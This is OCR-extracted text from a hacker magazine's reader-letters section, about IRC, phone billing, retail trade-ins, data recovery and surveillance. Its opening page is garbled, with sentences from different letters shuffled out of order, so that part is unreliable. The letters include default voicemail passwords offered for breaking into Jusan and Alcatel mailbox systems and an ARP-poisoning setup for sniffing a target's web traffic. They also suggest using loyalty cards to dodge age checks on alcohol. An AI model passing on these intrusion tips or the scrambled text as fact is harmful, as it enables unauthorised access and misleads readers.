Incidentally. etc. if not mentioned specifically. In fact. I guess I’m back to the freenode servers. it’s IRC and stupidity is a driving force sometimes.” But totally disregarding someone based on nothing is absurd. the best way to scan article titles is through the search utility at our store (store. That mentality makes me feel that the servers are run by self-proclaimed elitist jerkoffs. We have a loose affiliation with the irc. Dear 2600: I’ve been a reader of 2600 for quite some time and was very disappointed when connecting to the 2600 IRC for the first time.2600.com). I’m not sure who is using my Internet ID. misunderstandings are often the norm. you were misinformed.VOLUME 26
information about its article/letter writers to private companies or the authorities. We just ask that you not submit material to us that’s previously been printed or is already accessible on the net. bandwidth. fakexsound All sorts of corporations and governments worldwide (not to mention a number of the more mainstream terrorist organizations) would be real keen on seeing who actually is responsible for the various words of wisdom that appear in our pages. And another question: would it be possible for me to publish that article in another magazine later? cu florian hannemann (a happy subscriber) Until we have a better search ability. I couldn’t find any of these keywords via the search function on the 2600 web page. and used that to pass judgment on the entire system. In this case. Thank you very much. so I would greatly appreciate a quick reply. This is very important to me. there’s no reason why more can’t be written on it. and occasional direct threats to these people. Of course. One of the great pitfalls of IRC is the amazing amount of idiots who are drawn to it and who live to cre-
Random Problems
213
. believed the answer they gave you. Shouldn’t the statements/questions you make/ask depict if you are a newb or not? I could understand removing voice from people who walk into the channel asking “how do I do this” or “teach me about hacking. I asked the ops why I couldn’t get voice and didn’t receive a response. Infinityx Just because something has our name on it doesn’t mean we control it. Your idea sounds like a great potential article. Undoubtedly. I haven’t been to the 2600 forum on IRC in at least four years. As seen below. I’m writing an article about the use of virtual machines to increase file safety and security or. this doesn’t mean our contributors will exercise the same caution. Dear 2600: I was trying to get on the EFnet IRC forum about five minutes ago and oddly it says that my address is banned. many of them would be interested to know the identities of anyone who actually dared to read our magazine. I joined #2600 only to find out that I couldn’t chat in the channel. transponders. And it pisses me off because they aren’t a supreme deity like I am. in other words. That said. either through hints contained in their writing or by revealing every detail of their personal lives through a Facebook or MySpace page that is easily found through their article/letter byline.

VOLUME 26
ate mayhem and get attention for themselves.THE HACKER DIGEST . I chose an obvious wireless access point. You will see that in words and in online actions and you need to learn how to not let it faze you. when you have hundreds of computer-generated usernames it’s next to impossible. They just keep pouring in. of course. I purchased a new phone. I noticed right away and said something to the effect of “it feels lighter!” My buddy looked at me like I had three heads (noob!). For instance.” I thought to myself. Naturally. But that’s not the case here. the solution in this case is simply to not grant voice access to unknown entities. Laugh it up. In this particular example. Fuck them in their stupid asses. thank you for all your hard work over the years. I mean. He was also kind enough to help me save some money on my bill by making a couple of changes in the system. It didn’t even subtract the 500 messages. many stories about Sprint/Nextel screwing me over and how awful the i880 turned out to be. when my bill was posted. I learned that anytime I added and/or subtracted features of my phone plan. I proceed-
214
. So. FL We appreciate the kind words but we’ve never been more than 68 pages. Fast forward about an hour and a half to the plane ride. I opened the box that was sitting on my doorstep and inside were my phone and a piece of paper that informed me that all I needed to do to activate the little shit was to turn it on. and having the charges taken off (credited towards my next bill). You might have to wait until someone is around to respond to you but once you’re known as a real person. I took the opportunity to hop on my laptop and see what was up in the world. I was told that I had to have my account switched to Nextel (not “together” with Sprint as the slogan claims). I became used to receiving my bill. they redirected me to their own page where they wanted me to view a small commercial in exchange for free Internet access. tray tables down. I left the store smiling on the inside knowing I would have an extra $120 in my bank account in 365 days. “OK. The bill I was supposed to pay was a little over $50. and lucky enough to have the seat next to me unoccupied. fine. While setting the ignore flag for one or two annoying people is easy. I was under the impression that I was immune to such things and kept my service with them. I hope 68 pages is not a trend we’ll be seeing with future 2600s. I need my 90-something pages of pure joy! 2600 is far more entertaining than even Playboy (I got married for the nakedness and tomfoolery I can have with my wife!). Different paper vendors may sometimes affect the weight slightly but we try to keep it thick enough to last. when I added 500 text messages a month to my plan. but I was shocked to feel how light it was. so just put in the paperwork. the guy behind the counter was nice about it and gave his apologies for what had happened. You jumped to the conclusion that it was some form of elitism. the system had the bright idea to add up every text (including instant messages) I’ve ever made in the history of my life together. Each of these usernames then spouts random gibberish and pretty much makes the channel unusuable for actual conversation between humans. Colby Yet another ringing endorsement for Sprint. It wasn’t actually called that. seat reclined. spotting the errors. I was in one of the large book retailers and picked up 25:4. All clear for electronic devices. I had a slight layover in Denver International Airport. something not at all uncommon in the world of IRC. Naturally. and charge me for every one. I clicked the link that allowed me access to the Internet and checked my usual sources. spending 30 minutes on the phone. The changes would reduce my bill by $10 a month. Dear 2600: On page 24 of the Winter 2002-2003 issue you guys printed your Sprint bill from the previous August. Other than dealing with annoying IRC types. I am always thankful for seeing it on the rack and actually having the money to buy 2600. something like DIAWireless. Honestly. I actually made a conscious decision to spend money on the i880 made by Motorola and extended my contract with “Sprint” for another year. So why did these charges occur? Why did “Sprint”/Nextel try to charge me over $670 last month? Simple. Much to my chagrin. an error occurred in the system. but close enough. right under that charge was my $10 a month fee for 500 text messages! I have many. it was for over $300. you should have no problem. your wonderful magazine!) and look forward to reading it over and over again every quarter. After sitting through the commercial. It’s all part of the game. Now. Three days later. For the next seven months. It is greatly appreciated! John and Lissa (the wife) Jacksonville. When I took the phone to the Sprint store to have it activated. the first message I read when it got to the main screen was “Activation Required” in a font that looked like it was designed by a fucking punk. my new phone is all I care about. Dear 2600: During the holidays while heading east to visit relatives. but I would lose none of the features I actually used. Naturally. when I turned it on. I quote Sprint because upon payment for a phone that was not in stock. certain primates enjoy unleashing hundreds of usernames into a channel at the same time. I made changes to the account in each of those seven months. but it all boils down to this: Fuck Sprint and Nextel. Unfortunately for me. Dear 2600: I am a long time reader of your mag (OK. Several months ago.

I was at a small gathering of friends and. Borked Pseudo Mailed wrote in about the audio clip of the former Area 51 employee talking about aliens taking over the Earth and shit. I was redirected to a web page that said “Warning . I found it hilarious and very intriguing.leading to 12.at least to me that is what it sounded like. which I was locked out of. most decided to call it a night.VOLUME 26
ed to sprawl out and boot up my machine. it’s the premiere of ABC’s thrilling new reality series Homeland Security USA.msnbc. despite the grim subject matter: “National Safety Council found that driver use of cell phones contributes to six percent of vehicle crashes . Arkhayne Dear 2600: This is a half inquiry and half story time. this was part of some major screwup at Google where every page anywhere was listed as potentially harmful. It had the particular frequency of clicks that sound as if keys were being pressed at a fast rate. you can count on someone letting us know about it. I’m not too familiar with error codes or system sounds pertaining to the phone system.” R. Dear 2600: Did anyone see The Late Show’s amusing mockery of ABC’s new reality show Homeland Security USA the other day? I thought it was hysterical.” I shut the process down and proceeded to find where it launched from. I never got to write in for the previous issue. It just doesn’t get any cooler than this. apparently also great for drinking! Sync The article in question is entitled “Georgia brewheisters steal 2. write an article. every time the number “2600” appears in any context. Dear 2600: I Googled 2600 today and when I followed the link that I was provided.THE HACKER DIGEST . It lasted for a couple of hours and was attributable to human error. I would get this every time for the next hour. My city has an automated phone system that allows you to call it. Could this have been some strange erroneous busy code? Or was it a cheeky hacker playing a New Year’s prank on my entire city? Hopefully I can get an answer. Naturally. after all of the festivities had occurred and the beer/alcohol began to turn on us. which happened to be my temp folder. Syntax
We suspect that whoever was in charge of making or maintaining the recordings screwed up and hit the record button at the wrong time. Keep hacking. Dear 2600: In 25:4. but to my surprise I did not quite get the familiar voice of the bus check ladybot.com/ id/22418481/.600 cases of beer: Thieves on the lam after taking loaded tractor-trailers and swiping the suds.” Check it out. which this could have been. I made plans to fully investigate the entire process upon my return stop in Denver. So. I just booted into Linux and deleted it from there. I am sure there are plenty of other curious readers who would be interested as well. what it was doing. input a bus stop number.000 serious injuries and 2600 annual deaths. I just deleted all but one file. I should have analyzed the offender to see what it was.000 crashes . I know. it’s cool shit. only to realize that I had to walk home in the freezing cold. Around 1:30 am I attempted to call this service in order to check what time the bus would get to the closest stop heading in my direction. A few minutes in. but when I called the bus check number I received the sound of someone typing on a keyboard .or 636. Hence my being unable to trace the infection and find out what it really was. The real bummer is that on the way back. To remove the final file. 2600 is a great number. This took place New Year’s Day.” Yes. etc. and there were a few files and I believe two folders inside associated with the bugger. capturing the sound of their own typing and erasing whatever voice recording was already on there. I opened the folder. I just wanted to pitch in that the metal band Tool edited this recording a bunch and released it on their CD Lateralus as “Faaip de Oiad. and hear the time of the next bus and the three coming after it. I’ll be waiting. It’s quite a nifty and convenient system. Sadly. Sync Dear 2600: Had to laugh when I saw this.msn. I would be quite interested in hearing what he or she can discover about this little issue. They played a video that said “Tomorrow night. So explore. I knew that it was a recording because the typing was always the same until it stopped. Don’t
Random Info
215
. if there is anyone in the Denver area or anyone who is bored at Denver International. At first. and left it alone. Let your curiosity be your guide. At this point. We find that most suspicions of “hacking” are more easily attributable to a good dose of simple incompetence.visiting this website may harm your computer!” What the heck is going on? Please don’t tell me the biggest search engine in the world is now using its weight to censure sites that don’t conform to its standards! Robert Royer As you no doubt know by now. I had a few delays and there was no opportunity to explore at the airport as my connecting flight was already boarding when I landed. I know. Holden Dear 2600: Also thought you may be interested in this little article at www. so I call up taskman and saw an unfamiliar process called simply “cleaner. And it really should. maybe win some free 2600. I was noticing a bit of a slowdown. I had at that point a limited battery life and didn’t want to mess around with it.

second sentence reads “we willll certainly see a good deal. cash. I read 2600 on a regular basis.) and the password default is the voice mailbox number itself! The admin voice mailbox uses 0# with a password default of 9999#. we’ll be sticklers about giving you back store credit for it. generating a nonsense word rather than an edited one. I got a message saying to press “star” and it would send me a text message so that I could subscribe to the service.com and it says that to sign up it is $9. and if we don’t like you. or little signs on the shelves or even
Random Feedback
cardboard displays on the counter.) and the password default is 1234#. the following should be useful: the users’ voice mailboxes use formats of 1234# (5678. This apparently resulted from somebody at the book publishers attempting to remove the contraction “we’ll” from the original article and replacing it with “we will. 20 percent for four. sell them on eBay. It just doesn’t get any more random than this. you are still getting more store credit. Just look for anything.everyone’s got to eat).” Our editorial fail-safe mechanism must have kicked in at this point. I know. just not cash. if you want to make money off your used games. at www. 102. I am a current employee of Gamestop (don’t lynch me . debit.numsvc. our jobs are rated/ ranked on how many reserves we get and a cancel hurts the store. Just an FYI. Honestly. and these invariably stack with the Edge Card if you’ve got it (the Edge Card is a $15 subscription to Game Informer magazine that gives you an extra ten percent on trade credit and an extra ten percent off used games for a year). ulysses This is actually the first time anyone has said anything. and customer..aspx. “Gaming Gamestop. We’re impressed . Trades are where Gamestop makes all its filthy lucre. I found the article interesting except for one minor detail. and I’d thought I’d let you guys know that the extra 20 percent trade credit that Unanimously Anonymous refers to in his/her/its “Gaming Gamestop” article is called Power Trade. as a side note. whatever).pdf And to hack the Alcatel VIS electronic card mailbox for installation PBX. or even ask the salesperson if they’re running any sort of trade-in promotions. It sent me a message referencing the website www. It’s stupid to take them to Gamestop. and am a manager for said retailer.gamestop. Dear 2600: This is for the information phreak! Here is information on how to hack voice mailboxes using Jusan Fonomail Proattendant: the users’ voice mailboxes use 100# (101. read it cover-tocover. Jeff It just doesn’t get any closer to reality than that. or bonus dollars (five dollar store credit for each game worth more than a dollar. It just doesn’t get more revealing than that..com/rl. so they’ll tell you right off the bat.” I must point out an inaccuracy. they either run extra percentages of trade credit (ten percent credit for trading in three games at once. Also. etc. Look for the nincompoops behind the register.VOLUME 26
miss a minute of the pulse pounding excitement you’ve come to expect from Homeland Security. though: competent Gamestop employees (all three of us) know how to check to see how you paid for your game reserve (trade credit. I’m sure you have received mail about this but maybe not. etc. Dear 2600: Page 596 of The Best of 2600. I tried it to see what it’s all about by calling from my cell. No thanks! If a number is listed.99 billed to your cell phone bill monthly.” And then they show a video clip of someone waving a metal detector wand around some poor lady at the airport. and 30 percent for five). It sounds like some sort of Mountain Dew flavor. Yes. That detail is that the computer system we use will now tell how the reserve was paid for and will only allow us to pay back a cancel in the form it was paid for. Jason
216
. Big G Dear 2600: In regards to an article in 25:4. because the company views cancels/lack of reserves as lack of interest in product so they will ship less to that store/market. but you have to trade in at least three games).com/gs/specialty/tradeins/ offers. Anyway. the customer. and now have a new favorite magazine. A lot of the time. third paragraph. Mr Velleman from France Thanks for the info.” I’m not sure if it is an original typo from the zine or from the book. You can check on the Gamestop website if there are any decent trade-in promotions running at the time. Dear 2600: I’d just like to say that I picked up the quarterly for the first time today. Anonymous Dear 2600: In a letter in 25:3 you mentioned the service 1-800-MY-ANI-IS. The sales brochure for this system can be found at www. The admin voice mailbox uses 999# with a password default of 9999#.THE HACKER DIGEST .jusan. employee. a reverse lookup is free at anywho. A little caveat. and often there’s stuff on the outdoor sign about it.both in your finding it and in everyone else not finding it. Granted.es/eng/pdf/Fonomail%20 ProAttendant. Usually there are big signs hanging from the ceiling that’ll tell you which titles are available with that promotion.

it began forwarding the DNS to the Internet properly: net. One of the best highlights of my HOPE experience actually came after the conference itself. like a good lemming. Furthermore. Simply put. Many people seem convinced their ability to affect their own lives in any way (let alone in a positive manner) is effectively null. or that you should never stop praying for someone to save you and start saving yourself seems pretty effective for most people. I was absolutely distraught. and thank you 2600. the government probably makes a piece of the profit for every converter box sold through a contract between them and the manufacturer. in 25:2.youtube.conf. in fact. You definitely have a new reader for life. Fast forward to January 11. Thinking the images had been cast into the digital abyss.all.04-LTS on a Dell Mini 9 netbook. After getting all of the tools loaded and resolving all of the library dependencies. Once the messages were gone. found at bugs. Dear 2600: After reading “Fun with Network Friends” by Uriah C. For more info.com/ watch?v=60AJ4Mi1kNc) once thought lost are now on the net. After taking many photos and videos. We went home and I hooked up the camera to my Windows box to extract the data. I verified that I could surf to IP addresses and webspy would detect and display those and I saw those in fragrouter. Ten minutes later.google. I went to a big-chain retailer to print out the images at their photo kiosk which unfortunately was out of order. then arp poisoned my targets. I decided to try out the tools featured in the article. On a personal note. After adding the following lines to /etc/sysctl. issuing coupons to offset the replacement costs for the conversion boxes (two $40 coupons per household). I settled down to have fun with my network friends.default. that is not true.
217
. which. Then I launched webspy and firefox. Thanks again. I held down the “Enter” key to get rid of. The fact that they seem to have run out of allocated funds by the time this letter was composed and are putting people on a waiting list is a completely different matter. The government was. I launched fragrouter. In fragrouter I didn’t see any traffic but ICMP traffic. Upon doing so. when the user clicked links within pages. The result was the same.net/ ubuntu/+source/procps/+bug/84537. my wife.dtv2009. Back in October of 2007. it didn’t matter if my wireless card was in promiscuous mode or not.ipv4.com/PTCruisin/ ObamaAiken1007#5290135149281834562) and video (www. I got multiple messages about corrupt data.conf. and had a real blast at The Last HOPE (thank you all. when I showed up to work wearing a HOPE shirt and a 2600 cap .VOLUME 26
Dear 2600: Concerning the letter in 25:4 from Unknown Unknown which said: “By the way. On a long shot. CJ Dear 2600: I sat with the intention of merely asking no one in particular if they’d noticed a trend in advertising. for making it possible). the target computer couldn’t surf the Internet! The DNS query kept timing out. so too were my images. I’m a recent convert to the hackerdom (now starting my second year of regularly buying 2600). I looked to the Internet Search Gods for the answer.” As far as I know. These are low quality shots from having to peer in through a cracked-open door before the fire marshal would let more of us in. However. it worked brilliantly. In addition to that. conf. with Ubuntu.launchpad.ipv4. Thanks for letting us know.THE HACKER DIGEST . First. 2009. the “Introduction to Forensic Data Recovery” (25:4) was especially useful. I decided to plug in my camera to my Ubuntu desktop and run the “dd” command and the “Foremost” recovery tool.gasp!) and instantly thought of my loss.forwarding net. It was as though it was written especially for me. As a side note. Thank you Paradox. I had recovered snapshots of precious memories long thought gone. Finally.and was allowed to work on the company’s main server without anyone even saying a word. they did not always display and I did get an unexpected crash from webspy once. I found it in the form of bug 84537. visit www. I continued to use the memory card over the past 14 months. I read the short but detailed and interesting article (including the part about immediately ceasing use of the storage device . then one-year-old son. after spending a couple of hours troubleshooting. but that all went unnoticed by the target. everything was working as advertised.gov/.
I’ve credited Paradox and 2600 in my Picasa Album and YouTube videos for helping make them even possible. the user must prefix all of these commands with “sudo”. Encouraging the idea that to be different is bad (the debate about what defines “different” or “bad” is totally beyond the scope of this letter) or the idea that the bad things that happen to you are always someone else’s fault. I am running Ubuntu 8.forwarding Upon launching the tools again. A photo (picasaweb. And of course it didn’t work. Arethusa Dear 2600: I picked up my first copy of 2600 today. South Carolina to see the underdog candidate Barack Obama speak. Steven C Jackson It’s always good to hear an article has actually helped someone in the real world. For me. and I went to Aiken. Then I thought about an article I had just read in 25:4 called “Hack Thyself” and started thinking about an even more subtle form of manipulating people within the system/antisystem mentioned.

but you never will. So know thy enemy. only there will not be the available oil because.S. Most people aren’t even going to register it at first. John Doe of Lagos. But the more I thought about it. of course. with responses usually saying “get a life you paranoid fucks. but there is a more specific term for that activity: “pump and dump scams. and I don’t even have asthma. so it’s not your fault. I (and most others) am not talking about how bad it is now.” They are plentiful and obviously illegal. and then you get your info. but there probably isn’t any to get anyway. When you stare long into the abyss. pull a pump and dump. several billion dollars of tar sands development in Alberta. as an avid cyclist. I didn’t know. it is generally agreed that thanks to the drop in the price of oil. however. Go register any of my old free email addresses and get ready to be subjected to news of scores of penny stocks about to hit the roof. and the harder the start is to catch. the less you know. a whole great big whack of projects were terminated. as I just pointed out. the ultimate reason not to bother lowering the price of gas goes back to something
218
. a number of projects that were planned have now been deep-sixed. “yes. even hostile. right through the dead of winter on my old steel frame. the pros of happiness do not outweigh the cons. Well. but the symptoms kept coming back. it will burst through the ceiling in an orgy of frenzied buying that will make the $146 USD/ barrel look cheap. as it will eventually. so it is possible. This information is all delivered in a manner that pats you on the back and says. I live in Canada and make a seven kilometer one-way commute to my job in an office in downtown Toronto. Yes. First. nobody knew. and the exceptions are the targets of ever increasing efforts to sneak that mentality into their lives.unless you pay attention now. You’re greeted by a jaunty (in the drug company case) person. For example. this is absurd.to quit smoking.(or her?) self a few bucks at the pump. The long term consequences of that will be about as great as a Hummer H1 600 miles from the nearest gas station with nothing but fumes in the tank. chipper and fully of energy. “It’s OK. federal budget deficit. demand will return to where it was. the more dangerous it seemed. they’ll start to think they didn’t know that either (even if they did). Canada are now on ice. In this case. Some intangible think tank has an epiphany. Turns out asthma doesn’t go away!” Now this was not a surprise to me. the happier you are (I’m generalizing here). you must rely on outside sources (like the friendly federal government) to inform you. gloomy looking people designed to mirror (again. When the world economy recovers.VOLUME 26
There are exceptions. All the credit to them. At first I thought it was just absurd. you didn’t know. In fact. the harder the whole process is to stop. What I really want to go after is Isreal’s fundamental premise that the value of Exxon or Shell or any other petrochemical company affects the long term value of oil. I’m sure it’s difficult for most people (maybe even anyone) to imagine things like reeducation camps or mass brainwashing. We’re looking ahead. I imagine mirroring how you’re supposed to want to feel. though.” This indication that not only is information on any given subject not important or desirable. You can’t find it though. So oil won’t just spike. they say something like. but be careful. “I’d start out strong. You won’t even know it’s happening until it’s too late . Thanks to 2600 for doing what you do. The tactic I speak of seems to be trying to convince people that it’s normal (and even kind of fun) to be totally clueless about very significant decisions you make or about parts of your life. I point to a recent tactic of drug advertisers and PSAs. the better!” (Yes.and fail .”) So go ahead.THE HACKER DIGEST . you’re greeted by dour. and helping keep us out of the camps. circulating “inside information” in an effort to effect stock prices is social engineering. but then my will power would fade” and then you find out later in the ad that smoking is more than just a habit. the reason for oil’s price spike in the summer of 2008 had almost nothing to do with events in the Exxon boardroom. hell. “the more insanely overpriced gas is. this is only my perception) how you’re supposed to feel when you try . “I treated my asthma. In my example.) But more importantly. Dear 2600: Isreal obviously went to some length to save him. Anyone who ever learned anything can probably tell you. that and news of a Mr. With the PSA in my example. the abyss stares back. and it can’t possibly be as bad as you say” (though not always in so many words). but the recent plunge is even more speculative. but eventually they’ll hear it so much. It’s a nicotine addiction. (I love the world of business only there is a writer permitted to use terms like “a frenzied orgy. But to me. Vandy It’s what we do. the market spike was speculative. and so the disease spreads. But a few points are probably worth mentioning. Yes. Nigeria who wishes to involve me in some scam that will enrich me to the tune of the U. I’ve seen letters and articles about the subtle ways the “the man” is out to get people upset. Isreal should have invested more time in learning about peak oil and the enormous demand for fossil fuels by China and India. watch TV. and it won’t be you who finds it. or just plain dead. ignorance truly is bliss” and indeed. my thoughts are.

and might not be sent off-site. And. the second largest supermarket chain in the U. or maybe even creating a new card with a slightly altered birth date. page 41). or otherwise in the midst of a purchase. this is 2600.html). Or would that take too long? Using a barcode generator on a card’s number would probably work.com/2007/12/notepad-tricks. It was actually the “bush hid the facts” comment that tipped me off.” Dear 2600: While reading a letter from “Greggg” (25:4. Dear 2600: Thanks to Yimir for “Hacking for Beer” in 25:4. Beer is moderately more expensive than your fridgepack of 7 Up. I actually cheated and got the specifics of why it works from a search (ended up at this site: hungryhackers. every time you save it. I refuse to use the kiosks. These are what were shown in court: a zoomedin image of the person signing a credit card receipt. thus creating the potential for mass layoffs. The 18 8-bit characters are read as nine 16-bit (nine squares). One thing is certain. though. On my next stop at super-behemoth-mart after hearing about this. “Osama bin Laden called. And that is not hacking. and found that whenever people were accused of shoplifting.” and I believe should have kept this article from ever reaching the printing stage. offsite. and other details. And it would be interesting to see if the amount of shoplifting has gone down over the years as a result. or credit card fraud. One in particular caught my eye: “Hacking for Beer.) What I saw was a dedicated camera (in a smoked glass ball) ceiling-mounted over each and every cash register. as seen in the following letter. it will append a timestamp to the end of the text. After all. I like to think you’re a bit more intellectual than that. Video of the rest of the store probably isn’t retained as long. What will result when reopened are squares. From then on. five letter scheme). where it belongs. then save. three letter. swiping their debit card.blogspot. day/ time. But as far as prosecuting any illegal activity at the register is concerned. Since they weigh the same. But this is about the article itself. I anxiously awaited my new issue (25:4). And please help keep articles on illegally discounting booze in some blog on the net. thus keeping a log.VOLUME 26
I used to say to rude drivers when I would bike past them. (No. oftentimes the discussions that come about as a result of someone advocating such behavior can yield some interesting facts. These are not necessarily used together. That is just outright stealing. beware of the all-seeing eyes in the sky! Estragon The amount of surveillance these days in a typical supermarket is nothing short of astounding. I hope people in the industry can tell us more about those uses. if not years. Another trick I found was that you open a text doc. Unfortunately. I was reminded of the trick in Notepad I had found online a while back. We can imagine biometric identification methods used by law enforcement to track people. My problem lies under “The Hack. or similar infractions in the supermarket.” Two of my favorite things.LOG” and hit enter. then save. but it is read as 16-bit UNICODE.
219
. and all kinds of other nefarious stuff (as envisioned in “Business Intelligence” in the same issue). in which supermarket loyalty cards are used to bypass age screening for alcohol purchases.S. My guess is that the register transactions are warehoused for at least months.THE HACKER DIGEST . then save the barcode to stick on a 12 pack of beer. using someone else’s number (many stores have taken to using your telephone number as your card number) if you can enter it manually. I don’t know how long these records are kept. and the “self-checkout” kiosks (gaining some popularity). had the honor of serving on a grand jury where we live. amount of transaction. One that could easily be exploited simply by giving the club card to a friend. We suspect it hasn’t. beer is not soda. The article gets into the whole “club card” discount system (employed at most all grocery chains). I looked up. My advice to anyone considering fooling the supermarkets like this is: look up! My S. the young reader with grammar and spelling problems. For those who found it hard to follow. This constant monitoring is something we’re getting used to which will forever be seen as “normal. Still images of register transactions are tagged with the person who made the transaction.O. he was talking about this: create a new text document. since the face was visible (though from overhead). three letter. as is my usual routine. the supermarket was able to provide total video surveillance of all transactions to the prosecutors. They also have one or two cameras in every aisle in the store. Yimir suggests that people buy a 12 pack of soda. I think he wants his oil back. You are saving the document in 8-bit extended ASCII. How funny.” Michael Dear 2600: As always. It may have been a clever discovery. as corporations use them to decrease the need for actual tellers. it should work. gHOst_Guard While we agree that stealing is wrong and make every effort to discourage people from doing such things. though they have a similar setup. type “. I quickly got to reading the shorter articles first. and shouldn’t be confused that way. Type in something like “bush hid the facts” or “this app can break” (or anything that follows this four letter. not WalMart. as long as you get away with it. My local place is owned by Kroger. I think Yimir needs to quit trying to convince himself and others that stealing is OK. The cameras are angled somehow.

I know a great deal of readers glaze over when politics are covered. I’ve heard the blacklist stories and am wary to subscribe.
220
. Only through open discussion and constant sharing of information will we continue to figure things out and devise ways of making them better. This article explains that hacking isn’t limited to areas with high technology. Windows’ (despicable lack of) security.THE HACKER DIGEST . that the pioneers of hacking. the feeling I had was very important. Something didn’t sit well with me. Perhaps if the article was written with a little modesty. We hope to see more people reach out and meet others who share their interests without worrying about the ramifications. Like I said. and a tactician is now in place. We haven’t already heard of all the great names in hacking. an essential curiosity deeply ingrained in our genetic fiber. Every three months. Craigslist post flagging. I hope to share my experience with you next time. psychological aspects of the hacker mindset. it’s also a wonderfully rounded issue that covers all aspects of the hacker mindset. This can prove to be a blessing or a curse. this time in Swiss form. Hack the political system. He had a whole letter complaining about the “Thirteen Years of Starting a Hacker Scene. but perhaps making a collaboration of silly things like this would make a nice. It is this hope for knowledge and clarity that will forever live on. I didn’t really care for it myself. I thought maybe a page was missing from my copy.VOLUME 26
I don’t know if it would be cheating. Either way. (I’m not even going to bother getting worked up over the appointments he’s already made. but. the story ended with an eagerness to discover what could be. it would have been easier to take in. Thank you for all the work you do to stoke the flames of creativity. The rest of the issue covered a lot of topics that even the most basic-level user has encountered. buffing the admin’s ego in the process. The reign of the iron-fisted cowboy is over. However. I’m not trying to dismiss the author completely. It is a new dawn. Well. to start. along with some hacker insight for the uninitiated. our protagonist was still willing to dare himself to see a successful outcome. 2600 is the most underrated social commentary of the (dis)Information Age. But. Even if the attempted hack had failed. Lost files (and the recovery thereof). This issue covered all the bases. From the beginning we’ve been trying to reduce the amount of fear that is felt in this community and a great deal of progress has been made. light article. lest a new Patriot Act slip through Congress. however. social engineering. awaiting the next release of what has become my favorite publication (and sometimes skipping work to read it). It seemed as if Derneval Ribeiro Rodrigues da Cunha (calling him just “da Cunha” didn’t look right typed) was just trying to get his name out there. But. pernicious obfuscation. above all others. I admit I felt many of the same feelings that the writer of the letter did. I visit the same magazine vendor every day for weeks. not as an avid reader. but a new contributor. Shocked998 Dear 2600: Not only is 25:4 a fun time signature to use when playing music. and did so in a way that even the script-illiterate could figure out what was being said. the people who instigate critical thinking.) We must closely watch those in power while they get accustomed to handling such a responsibility. I was annoyed that Mr. like the readers of the magazine. as I believe it helped me form a connection to the author. and you can reshape the world we live in. Wrenshall didn’t continue the story. perhaps explaining further exploits to get the information he really wanted and to find out how his paper-hacking was foiled. for once I think it’s finally time to attend my first local meeting. Always keep learning! ZANAC Thanks for writing. We all should know that 2600 doesn’t use articles like this to “filler up” the pages.” which in turn was a whole article of complaining too. But. the message and hacker spirit is never compromised.” same issue and page. as commented on by the 2600 staff. I wasn’t sure whether the stories were inflated or even fabricated. I assumed the teacher had already played matchmaker and the forms were just a ruse. I do think. should be given some recognition. I don’t know how to take that article. as well as letters and letters and letters and letters from all over the world and written by people with various levels of freedom. depending on the side he chooses to take. it has the most important and widereaching effect on this community. It is only through knowledge that we can gain the power to effect change. From “Beginnings. I finished “Conspiracy” feeling unfulfilled. Like many other readers.” a reflection of the current political climate. and there will be people who disagree with you. you will never always agree with everyone. stepping away from the interesting app stuff. We should be very attentive to our new president’s first moves in office. and I admire the dedication you have to keeping it in circulation and the dedication your readers have to breaking down the illusions of secrecy and finding out what some people are too scared to admit to doing with our personal information. and my personal favorite: the Adrenaline rush. I also have a comment about “PMD. and it took little time to figure out what it was. through to the closing statement of “Conspiracy” by Peter Wrenshall. There are still plenty of people who can contribute to the community. no matter how many forces attempt to distract us all from it (often successfully). which I suspect his area wasn’t.

If anyone would like me to write it up. I believe it is more likely that they chose a defaultallow to make sure their clients are able to get online and have a good user experience if they run into troubles versus having to contact tech support which then has to have training and be responsive potentially 24x7. I could write up an article on how to get started hacking. however. I hope to one day have something neat to contribute. and I will be picking up the new issue shortly. Since I only started reading 2600 back in 2005. So again. If yes. thinkt4nk That would be telling. and I’ve wondered what goes on with the power lines from the perspective The Prophet gave in his article. The address is articles@2600. We’re always open to suggestion on what we should be doing and how we can do it better. Dear 2600: I wanted to share an amusing story with you that happened when purchasing The Best of 2600 last fall. the owner of the electrocuted dog had to watch. and Facebook. I would like to play devil’s advocate in that the default-allow was actually a choice by design and not a mistake or oversight.. This is the result of a crumbling infrastructure in sore need of constant maintenance. I am an avid reader of 2600. Books such as these get my mind into the hacking mode. this is a great book and I’ve thoroughly enjoyed reading it. but I just wanted to let The Prophet know how much I appreciated his piece in 25:4. In New York. If a place as fancy as Dubai were actually attempting to rely on their hotel Internet connection sales for income. helplessly. Let me know if your website can survive massive amounts of hits from sites like Digg. Last fall.VOLUME 26
Dear 2600: I read the message from the guy about the Art Bell Show that went off the air for a half hour. com/r/hackers. the author implies several times that the payment bypass technique used is due to the design flaw of a default-allow mindset for the payment page. I just read The Best of 2600. and perhaps you might consider writing a follow-up? Pampaluz This has been a recurring problem in the streets of New York and it’s even claimed the life of a human who was trying to save her dog from electrocution..com. but cannot fix them fast enough. here are two links: www. with nothing he could do.payphone-directory. while his dog died horribly right in front of him. Hacking is a lifestyle. Reddit. If you are the person whose dog died after a week. I submit URLs like a monkey to reddit. not a passing phase.. it’s awesome to get caught up on the history of the hacker scene and what it’s all about. then feel free to respond. but until then. The current one seems antiquated. We appreciate the enthusiasm. Pulling the leash only dragged the dog over the spot that finally killed it. then you should not waste your time. Being a network analyst. Dear 2600: In the article written by forgotten247 about bypassing the payment and proxy filter in Dubai. As a side note. Dear 2600: First of all I would like to thank 2600 for publishing this letter. thanks for writing this article. but it would look something like how to learn to program in ten years. I walked into my local Chapters store
Random Offer
Stories
221
. Anyway. they would not have a default-allow posture. I would love to see you build a website that focuses more on reader contribution.payphone-project. Ben Edwards Two dead dog references in two letters . Maybe there’s more! bogaty Dear 2600: I doubt that this letter is publishable. I am getting tired of people asking how to hack their school’s server or how to learn to hack. since it is so dependent on the client web browser which is certainly a major design flaw. the city is aware of these problems. Please tell me that it was a deliberate reference to Vonnegut’s Slaughterhouse-Five. The dog’s owner could do nothing legally. jus Dear 2600: In response to Mario Chiesa’s letter in 25:4 regarding a directory for public payphones. As a dog owner. Lawsuits have been filed against both the city and Con Edison. among other excellent articles. they have a website to let dog owners know where not to walk their dogs! Apparently. Though I certainly do agree that the ease of circumvention of the payment system is really a tragedy.what are the odds? We look forward to seeing your article. then that shall be my mission! freakball We are working on major changes to our site and would love to have as much traffic sent there (willingly) as possible. exposed underground electrical lines that are so prevalent. Dear 2600: As a side note.. reading the articles about the old telecom/data networks and how they worked was great.THE HACKER DIGEST . And you can’t sue. I’ve thought a lot about this. Thank you very much for answering so many of my questions at once in your 